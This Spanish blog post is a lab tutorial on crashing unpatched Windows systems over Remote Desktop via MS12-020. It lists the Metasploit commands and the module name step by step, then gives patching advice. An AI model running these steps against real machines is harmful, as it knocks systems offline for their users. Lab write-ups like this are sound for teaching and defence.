lunes, 2 de junio de 2014

DOS por control remoto



Hoy vamos a practicar con una vulnerabilidad que afecta al control remoto en sistemas Windows, concretamente a las versiones de Windows 7 , 2003 server, 2008 server, 2008 r2 server y XP que no han sido parcheadas.


El escenario consta de 2 maquinas: una es el atacante con Kali Linux de sistema operativo y la otra sera un windows Ultimate limpio sin actualizaciones.


La vulnerabilidad fue catalogada como: MS12-020, solucionando la vulnerabilidad de ejecución remota de código al servidor de Terminal Server, con lanzamiento del parche el 13 de Marzo de 2012.


Para esta vulnerabilidad se necesita tener una opción especifica, que es la de permitir las conexiones desde equipos que ejecuten cualquier versión de Escritorio remoto (menos seguro). La primera no dejara pues esta vulnerabilidad necesita tener habilitado Escritorio remoto y la 3º es identificación a nivel de red con lo que no tendríamos paso al equipo.

escritorio remoto vulnerable
Equipo vulnerable 


Ahora desde nuestro Kali Linux procederemos a atacar:

Lo primero sera poner en marcha metasploit, así que abrimos una consola y escribimos: msfconsole

Para buscar el exploit, haremos: search ms12-020
search ms12-020


Ahora lo cargaremos:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Para ver las opciones que tenemos: show options
Configuramos la maquina de la victima con: set RHOST 192.168.1.X

use exploit metasploit


Y por ultimo lo ponemos a funcionar con exploit o run.

Lo que estamos haciendo es enviar un paquete con unas características concretas a la victima por el puerto 3389 (Por defecto), y luego hace la conexión con lo que provoca que la maquina caiga.

exploit o run


Como vemos la victima sufre la pantalla azul de la muerte, originada por RDPWD.SYS, que es el driver del control remoto.

blue death screen
Blue death screen


Solución a esta vulnerabilidad.
La mejor solución es instalar las actualizaciones que Windows te sugiere, pues muchas de estas son instaladas en los equipos que las tienen actualizadas con lo que el margen que estas inseguro publicamente es bastante reducido.

Tambien se puede arreglar mediante un Fix it, oficial de Microsoft. No pretende ser un sustituto a la actualización pero tapara la vulnerabilidad. 



Happy Hacking!!

No hay comentarios:

Publicar un comentario